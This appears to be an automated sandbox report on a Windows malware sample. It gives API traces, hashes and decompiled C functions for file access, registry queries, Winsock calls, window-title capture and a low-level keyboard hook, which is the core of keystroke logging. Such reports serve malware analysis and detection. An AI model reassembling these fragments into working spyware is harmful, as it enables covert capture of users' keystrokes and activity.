                                                                                • Opcode ID: 9bf14a5df145d5f41df20096633609b72b1ec63d739e420429c19bf5600fe5fe
                                                                                • Instruction ID: 936fdab3816807404b6184885be68073097791833a96003579df1cad0b33865a
                                                                                • Opcode Fuzzy Hash: 9bf14a5df145d5f41df20096633609b72b1ec63d739e420429c19bf5600fe5fe
                                                                                • Instruction Fuzzy Hash: 2B115670181E40BFDB216334AD8C7AB7BA9EB41300F40843BE582936D0C7B868448F1C
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 58%
                                                                                			E00412DDF(void _a4, void* _a8) {
                                                                                				void* _t6;
                                                                                				int _t9;
                                                                                				struct _OVERLAPPED* _t13;
                                                                                				void* _t16;
                                                                                				long _t17;
                                                                                				void* _t19;
                                                                                
                                                                                				_t13 = 0;
                                                                                				_t6 = CreateFileW(_a4, 0x80000000, 3, 0, 3, 0x80, 0); // executed
                                                                                				_t19 = _t6;
                                                                                				if(_t19 != 0xffffffff) {
                                                                                					_t17 = GetFileSize(_t19, 0);
                                                                                					__imp__?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXID@Z(_t17, 0, _t16);
                                                                                					_t8 =  &_a4;
                                                                                					_a4 = 0;
                                                                                					__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                                                                					_t9 = ReadFile(_t19,  &_a4, _t17, _t8, 0); // executed
                                                                                					if(_t9 != 0) {
                                                                                						_t13 = 1;
                                                                                					}
                                                                                					FindCloseChangeNotification(_t19); // executed
                                                                                					return _t13;
                                                                                				}
                                                                                				return 0;
                                                                                			}










                                                                                APIs
                                                                                • CreateFileW.KERNELBASE(000177DE,80000000,00000003,00000000,00000003,00000080,00000000,00000000,000177DE,?,00409C9F,00000000), ref: 00412DF9
                                                                                • GetFileSize.KERNEL32(00000000,00000000,?,?,00409C9F,00000000), ref: 00412E0D
                                                                                • ?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXID@Z.MSVCP60(00000000,00000000,?,?,00409C9F,00000000), ref: 00412E1A
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,00000000,?,?,00409C9F,00000000), ref: 00412E2C
                                                                                • ReadFile.KERNELBASE(00000000,00000000,?,?,00409C9F,00000000), ref: 00412E34
                                                                                • FindCloseChangeNotification.KERNELBASE(00000000,?,00409C9F,00000000), ref: 00412E42
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$D@2@@std@@D@std@@U?$char_traits@V?$allocator@$?c_str@?$basic_string@?resize@?$basic_string@ChangeCloseCreateFindNotificationReadSize
                                                                                • String ID:
                                                                                • API String ID: 3215869252-0
                                                                                • Opcode ID: fa4d467d17345bb80924ef3185be0a48566cc4f8ae095e8dcd31704ebaf267b8
                                                                                • Instruction ID: e286a7eceb6258eec42f82ecdc09f82327f8599071822df4e1fbbe5006a6f2d0
                                                                                • Opcode Fuzzy Hash: fa4d467d17345bb80924ef3185be0a48566cc4f8ae095e8dcd31704ebaf267b8
                                                                                • Instruction Fuzzy Hash: EBF08171241518BFEB125F60EC88FFB7B6CEB867A4F108126FD15D6290CA744E418668
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                  • Part of subcall function 00402038: #23.WS2_32(00000000,00000001,00000006,0041BCB0,0040C8BF), ref: 00402053
                                                                                  • Part of subcall function 0040209B: #4.WS2_32(0041BE70,0041BE74,00000010,?,0041B320,?,0040CA5C), ref: 004020B1
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,0041B310,?), ref: 0040AD26
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?), ref: 0040AD30
                                                                                  • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                                                                  • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000068,?,?,?,?,?,?), ref: 0040AD44
                                                                                  • Part of subcall function 00402149: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,0041BE70,0041B310,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6), ref: 0040215B
                                                                                  • Part of subcall function 00402149: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,0041BE70,0041B310,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6), ref: 00402168
                                                                                  • Part of subcall function 00402149: malloc.MSVCRT ref: 00402175
                                                                                  • Part of subcall function 00402149: #16.WS2_32(0041BE70,00000000,00000000,00000000,0041BE70,0041B310), ref: 00402186
                                                                                  • Part of subcall function 00402149: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,00000000,?,0041BE70,00000000,00000000,00000000,0041BE70,0041B310), ref: 0040219A
                                                                                  • Part of subcall function 00402149: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 004021A4
                                                                                  • Part of subcall function 00402149: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 004021AD
                                                                                  • Part of subcall function 00402149: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 004021BA
                                                                                  • Part of subcall function 00402149: ??3@YAXPAX@Z.MSVCRT(00000000,0041BE70,00000000,00000000,00000000,0041BE70,0041B310), ref: 004021DB
                                                                                  • Part of subcall function 00402149: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 00402204
                                                                                  • Part of subcall function 00402149: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 0040220D
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0040AD6F,00000000,?,?,?,?,?,?), ref: 0040AD5B
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?), ref: 0040AD64
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@$D@1@@V01@@$D@2@@0@Hstd@@V01@V10@0@V?$basic_string@$??3@??4?$basic_string@Y?$basic_string@malloc
                                                                                • String ID:
                                                                                • API String ID: 3021022117-0
                                                                                • Opcode ID: 920b98becae29a99ec0fa19a0f55f8e27bcd435965bf0e4788e191e54b25dd4e
                                                                                • Instruction ID: 7b2f1eb0bf348bc8e64f130e1c0075fbfd626f93203aeb1fcbfc33f5f8d0b54a
                                                                                • Opcode Fuzzy Hash: 920b98becae29a99ec0fa19a0f55f8e27bcd435965bf0e4788e191e54b25dd4e
                                                                                • Instruction Fuzzy Hash: 4C01F272A0020867C700BF6AEC4B9EF7B2DDF94755F00043ABD02AB1C2EBB5595C82D9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E00412D56(void* __ecx, void* _a4, long _a8, long _a12, intOrPtr _a16) {
                                                                                				long _v8;
                                                                                				long _v12;
                                                                                				intOrPtr _t14;
                                                                                				void* _t15;
                                                                                				int _t17;
                                                                                				long _t19;
                                                                                				long _t20;
                                                                                				long _t22;
                                                                                				long _t24;
                                                                                				void* _t28;
                                                                                
                                                                                				_t24 = 0;
                                                                                				_t14 = _a16;
                                                                                				if(_t14 == 0) {
                                                                                					_v12 = 0x40000000;
                                                                                					_v8 = 2;
                                                                                				} else {
                                                                                					if(_t14 == 1) {
                                                                                						_t22 = 4;
                                                                                						_v12 = _t22;
                                                                                						_v8 = _t22;
                                                                                					}
                                                                                				}
                                                                                				_t15 = CreateFileW(_a12, _v12, _t24, _t24, _v8, 0x80, _t24); // executed
                                                                                				_t28 = _t15;
                                                                                				if(_t28 != 0xffffffff) {
                                                                                					if(_a16 != 1) {
                                                                                						L8:
                                                                                						_t17 = WriteFile(_t28, _a4, _a8,  &_a12, _t24); // executed
                                                                                						if(_t17 != 0) {
                                                                                							_t24 = 1;
                                                                                						}
                                                                                						L10:
                                                                                						FindCloseChangeNotification(_t28); // executed
                                                                                						_t19 = _t24;
                                                                                						goto L11;
                                                                                					}
                                                                                					_t20 = SetFilePointer(_t28, _t24, _t24, 2); // executed
                                                                                					if(_t20 == 0xffffffff) {
                                                                                						goto L10;
                                                                                					}
                                                                                					goto L8;
                                                                                				} else {
                                                                                					_t19 = 0;
                                                                                					L11:
                                                                                					return _t19;
                                                                                				}
                                                                                			}














                                                                                APIs
                                                                                • CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000080,00000000,00000000,0041623C), ref: 00412D93
                                                                                • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000002), ref: 00412DAF
                                                                                • WriteFile.KERNELBASE(00000000,40000000,?,?,00000000), ref: 00412DC6
                                                                                • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00412DD3
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$ChangeCloseCreateFindNotificationPointerWrite
                                                                                • String ID:
                                                                                • API String ID: 175865374-0
                                                                                • Opcode ID: b6fc8936da6e294b4790fd661f23c461e372249c0823290801eb98338cb1c386
                                                                                • Instruction ID: ca773920b5f39e1e62b037f934487c6bab51a0d9f38e2d78726aa57b3ce32958
                                                                                • Opcode Fuzzy Hash: b6fc8936da6e294b4790fd661f23c461e372249c0823290801eb98338cb1c386
                                                                                • Instruction Fuzzy Hash: 26118E71500508BFDF118F94ED88FEF7B6CEB05368F108222F911D6190D2B54EA09768
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • RegOpenKeyExA.KERNELBASE(?,80000002,00000000,00020119,80000002,00000000), ref: 0040B551
                                                                                • RegQueryValueExA.KERNELBASE(80000002,004140D8,00000000,00000000,?,00000400), ref: 0040B56E
                                                                                • RegCloseKey.ADVAPI32(80000002), ref: 0040B577
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 0040B596
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$??0?$basic_string@CloseD@1@@D@2@@std@@D@std@@OpenQueryU?$char_traits@Value
                                                                                • String ID:
                                                                                • API String ID: 2462357041-0
                                                                                • Opcode ID: 57c7c103ff9b08e3e02a73ce7dec204de8a86c9bec5313fbbfa2b155cf811d2d
                                                                                • Instruction ID: f17c32bc227b8fe577d0db1d358ecf0b28a093220f684ee6c8601fb0e55a49ce
                                                                                • Opcode Fuzzy Hash: 57c7c103ff9b08e3e02a73ce7dec204de8a86c9bec5313fbbfa2b155cf811d2d
                                                                                • Instruction Fuzzy Hash: F60108B650020DFFDF01DF90DC84DEA7B6DFB48348F104462FA05A6151D7309A659BA8
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E004052D5(struct HHOOK__** __ecx) {
                                                                                				struct tagMSG _v32;
                                                                                				struct HHOOK__* _t11;
                                                                                				struct HHOOK__** _t14;
                                                                                
                                                                                				_t14 = __ecx;
                                                                                				 *0x41b9a8 = __ecx;
                                                                                				if( *((intOrPtr*)(__ecx)) != 0) {
                                                                                					L3:
                                                                                					if(GetMessageA( &_v32, 0, 0, 0) != 0) {
                                                                                						TranslateMessage( &_v32);
                                                                                						DispatchMessageA( &_v32);
                                                                                						goto L2;
                                                                                					}
                                                                                				} else {
                                                                                					_t11 = SetWindowsHookExA(0xd, E004052BA, 0, 0); // executed
                                                                                					 *_t14 = _t11;
                                                                                					L2:
                                                                                					if( *_t14 != 0) {
                                                                                						goto L3;
                                                                                					}
                                                                                				}
                                                                                				return 0;
                                                                                			}







                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Message$DispatchHookTranslateWindows
                                                                                • String ID:
                                                                                • API String ID: 1978648212-0
                                                                                • Opcode ID: 52272d776155f8ea9757c9a67d2815f13097f215008760f7cfa802aa42738574
                                                                                • Instruction ID: 3f8d98675bb246c8319de4d6d7df696f93bc8797274e956dc3fa59b7a05fdffb
                                                                                • Opcode Fuzzy Hash: 52272d776155f8ea9757c9a67d2815f13097f215008760f7cfa802aa42738574
                                                                                • Instruction Fuzzy Hash: 5DF03071900A05EBC7205FA6AC0CEDBBBFCEBD5B42B50443EA885E2190E6788441CF68
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,0040969A,?,?), ref: 0041359B
                                                                                  • Part of subcall function 00412795: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000020,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127A4
                                                                                  • Part of subcall function 00412795: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@IGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127AE
                                                                                  • Part of subcall function 00412795: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127B7
                                                                                  • Part of subcall function 00412795: ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127C1
                                                                                  • Part of subcall function 00412795: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127CB
                                                                                  • Part of subcall function 00412795: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?), ref: 004127E1
                                                                                  • Part of subcall function 00412795: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127EA
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,0040969A,?,?), ref: 004135B2
                                                                                  • Part of subcall function 004135DE: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 004135EE
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,0040969A,?,?), ref: 004135CA
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,0040969A,?,?), ref: 004135D3
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$U?$char_traits@$G@2@@std@@G@std@@$D@2@@std@@D@std@@$??0?$basic_string@$??1?$basic_string@$?begin@?$basic_string@G@1@@$?c_str@?$basic_string@?end@?$basic_string@?length@?$basic_string@D@1@@V01@@
                                                                                • String ID:
                                                                                • API String ID: 384503197-0
                                                                                • Opcode ID: fc84d7bb029b3800a199890aa7fda8e35941668a1b6b46af4e7b1dfef16bc2af
                                                                                • Instruction ID: e9850064b0a36303cd24c251ff0e0265422eee26172e2298965a0cd1febf68d2
                                                                                • Opcode Fuzzy Hash: fc84d7bb029b3800a199890aa7fda8e35941668a1b6b46af4e7b1dfef16bc2af
                                                                                • Instruction Fuzzy Hash: 30F0DA7141021EEBCF04EFA0EC49CEE7779FB48254B444429F926D20A0EB75A659CB94
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000001,?,?,00000000,00408CAD,00000000), ref: 004030B4
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?), ref: 004030C0
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00000000), ref: 004030D5
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004030DE
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??0?$basic_string@$??1?$basic_string@?c_str@?$basic_string@D@1@@V01@@
                                                                                • String ID:
                                                                                • API String ID: 2505548081-0
                                                                                • Opcode ID: 9697f98c185c8dbb6fe00f519fde4b1936163652de48f83fe795a14545806d9b
                                                                                • Instruction ID: d80b3b6c6aed89596c133f447bcdc90fdca9c0e00c1408e091cb816f9a065f40
                                                                                • Opcode Fuzzy Hash: 9697f98c185c8dbb6fe00f519fde4b1936163652de48f83fe795a14545806d9b
                                                                                • Instruction Fuzzy Hash: A5F0F23240011EEFCF04EF94DC58CEE7B78FF88255B008829F926971A0EB70AA15CB94
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E0040B692(void* _a4, void* _a8, char* _a12, char* _a16, int _a20, intOrPtr _a24, intOrPtr _a28) {
                                                                                				char _v1028;
                                                                                				long _t16;
                                                                                				long _t19;
                                                                                
                                                                                				_t16 = RegOpenKeyExA(_a4, _a8, 0, 0x20019,  &_a8); // executed
                                                                                				if(_t16 != 0) {
                                                                                					L3:
                                                                                					return 0;
                                                                                				} else {
                                                                                					_t19 = RegQueryValueExA(_a8, _a12, 0, 0, _a16,  &_a20); // executed
                                                                                					RegCloseKey(_a8); // executed
                                                                                					if(_t19 != 0) {
                                                                                						goto L3;
                                                                                					} else {
                                                                                						E00402F9B( &_v1028, _a24, _a28);
                                                                                						E00403010( &_v1028, _a16, _a20);
                                                                                						return 1;
                                                                                					}
                                                                                				}
                                                                                			}







                                                                                APIs
                                                                                • RegOpenKeyExA.KERNELBASE(80000001,0040936A,00000000,00020019,0040936A), ref: 0040B6AC
                                                                                • RegQueryValueExA.KERNELBASE(0040936A,?,00000000,00000000,?,?,0041BCC0), ref: 0040B6C8
                                                                                • RegCloseKey.KERNELBASE(0040936A), ref: 0040B6D3
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseOpenQueryValue
                                                                                • String ID:
                                                                                • API String ID: 3677997916-0
                                                                                • Opcode ID: 0c6a4740dae7841fcf8964945fbab675c41921e593c3645a08b688649a1aa0f7
                                                                                • Instruction ID: 12c492740cd6cd608dd50e7b32a974a13a24a52f7ce3ce9e30b48251fadff788
                                                                                • Opcode Fuzzy Hash: 0c6a4740dae7841fcf8964945fbab675c41921e593c3645a08b688649a1aa0f7
                                                                                • Instruction Fuzzy Hash: CA01FB35100209FFDF119F90EC05FDA3B75FB88758F008025FA14A61A0D775D925EB98
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E0040B4C8(void* __ecx, void* _a4, void* _a8, char* _a12, char* _a16) {
                                                                                				int _v8;
                                                                                				int _v12;
                                                                                				int _t14;
                                                                                				long _t16;
                                                                                				long _t20;
                                                                                				signed int _t21;
                                                                                
                                                                                				_t14 = 4;
                                                                                				_v8 = _t14;
                                                                                				_v12 = _t14;
                                                                                				_t16 = RegOpenKeyExA(_a4, _a8, 0, 0x20019,  &_a8); // executed
                                                                                				if(_t16 != 0) {
                                                                                					return 0;
                                                                                				} else {
                                                                                					_t20 = RegQueryValueExA(_a8, _a12, 0,  &_v12, _a16,  &_v8); // executed
                                                                                					_t21 = RegCloseKey(_a8); // executed
                                                                                					return _t21 & 0xffffff00 | _t20 == 0x00000000;
                                                                                				}
                                                                                			}










                                                                                APIs
                                                                                • RegOpenKeyExA.KERNELBASE(80000001,00408EBE,00000000,00020019,00408EBE,?,?,?,00408EBE,80000001,00000000,?,?,?,?,0000000E), ref: 0040B4E7
                                                                                • RegQueryValueExA.KERNELBASE(00408EBE,?,00000000,80000001,?,00000000,0041BCB0,?,?,?,00408EBE,80000001,00000000), ref: 0040B505
                                                                                • RegCloseKey.KERNELBASE(00408EBE,?,?,?,00408EBE,80000001,00000000,?,?,?,?,0000000E,00415774), ref: 0040B510
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseOpenQueryValue
                                                                                • String ID:
                                                                                • API String ID: 3677997916-0
                                                                                • Opcode ID: 55f81898a082b856529423ab666f51d9d292b3708a6e04e50ac108d0079eece6
                                                                                • Instruction ID: e9b8f34285146556d923ff1311e539e3090c3a2a7499f994c32c4d3a3a900868
                                                                                • Opcode Fuzzy Hash: 55f81898a082b856529423ab666f51d9d292b3708a6e04e50ac108d0079eece6
                                                                                • Instruction Fuzzy Hash: A8F0F976900218FFDF118FA0EC06FDA7FA8EB48764F148165FA05EA150E7719A10AB94
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 58%
                                                                                			E00412660(intOrPtr _a4) {
                                                                                				char _v5;
                                                                                				short _v520;
                                                                                				struct HWND__* _t6;
                                                                                
                                                                                				_t6 = GetForegroundWindow(); // executed
                                                                                				GetWindowTextW(_t6,  &_v520, 0x200);
                                                                                				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z( &_v520,  &_v5);
                                                                                				return _a4;
                                                                                			}







                                                                                APIs
                                                                                • GetForegroundWindow.USER32 ref: 00412669
                                                                                • GetWindowTextW.USER32 ref: 0041267C
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?), ref: 00412690
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@Window$??0?$basic_string@ForegroundG@1@@G@2@@std@@G@std@@TextU?$char_traits@
                                                                                • String ID:
                                                                                • API String ID: 3479648101-0
                                                                                • Opcode ID: 63886bd1b0f191d4c741fb758813c9ae68fde036165b119f932706caa7c95f77
                                                                                • Instruction ID: 64d1ce8039e3a540394b6b1977bfd4dfbb3997696942590b923d2ce918142fcd
                                                                                • Opcode Fuzzy Hash: 63886bd1b0f191d4c741fb758813c9ae68fde036165b119f932706caa7c95f77
                                                                                • Instruction Fuzzy Hash: 40E0ECB950030FEBDB04EBA0ED4DED9777CAB44309F0081A1B61697191DA74A6498F94
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E004122C4(intOrPtr* _a4) {
                                                                                				struct _MEMORYSTATUSEX _v68;
                                                                                				intOrPtr* _t8;
                                                                                
                                                                                				_v68.dwLength = 0x40;
                                                                                				GlobalMemoryStatusEx( &_v68); // executed
                                                                                				_t8 = _a4;
                                                                                				 *_t8 = _v68.ullTotalPhys;
                                                                                				 *((intOrPtr*)(_t8 + 4)) = _v68.ullAvailPhys;
                                                                                				return _t8;
                                                                                			}






                                                                                APIs
                                                                                • GlobalMemoryStatusEx.KERNELBASE(?), ref: 004122D5
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: GlobalMemoryStatus
                                                                                • String ID: @
                                                                                • API String ID: 1890195054-2766056989
                                                                                • Opcode ID: 933be3831ea0970a646f6a91defc356e7c8b327d25a017e9f5a00cd18de0f79f
                                                                                • Instruction ID: 75f814dcae9d38af4eaa51e93271515a162649f50c927f4fe6c9e38d045eb332
                                                                                • Opcode Fuzzy Hash: 933be3831ea0970a646f6a91defc356e7c8b327d25a017e9f5a00cd18de0f79f
                                                                                • Instruction Fuzzy Hash: E8D067B8901308DFCB04DF94D54999CBBB9BB48344F404058E906A7350DB74E905CA95
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                  • Part of subcall function 0040309E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000001,?,?,00000000,00408CAD,00000000), ref: 004030B4
                                                                                  • Part of subcall function 0040309E: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?), ref: 004030C0
                                                                                  • Part of subcall function 0040309E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00000000), ref: 004030D5
                                                                                  • Part of subcall function 0040309E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004030DE
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,00000000), ref: 0040B934
                                                                                  • Part of subcall function 0040B708: RegCreateKeyA.ADVAPI32(?,?,?), ref: 0040B715
                                                                                  • Part of subcall function 0040B708: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BCB0,00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B724
                                                                                  • Part of subcall function 0040B708: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B72E
